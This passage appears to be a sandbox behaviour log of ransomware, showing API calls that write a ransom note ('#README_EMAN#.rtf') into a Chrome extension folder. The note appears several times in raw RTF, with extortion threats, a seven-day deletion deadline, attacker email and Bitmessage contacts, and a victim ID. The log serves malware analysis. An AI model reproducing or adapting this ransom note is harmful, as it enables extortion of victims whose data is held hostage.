th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nu y5\x97>\x13¹\x0cgR6÷Æ\x1dáh\x8f\"ûT¹\x9f\x03\x1f", lpUsedDefaultChar=0x0) returned 8717 [0278.175] WriteFile (in: hFile=0x294, lpBuffer=0x1f495e8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1f495e8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0278.176] CloseHandle (hObject=0x294) returned 1 [0278.176] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_US\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_us\\#readme_eman#.rtf")) returned 0xffffffff [0278.176] GetLastError () returned 0x2 [0278.176] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_US\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_us\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0278.176] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0278.176] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0278.176] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up 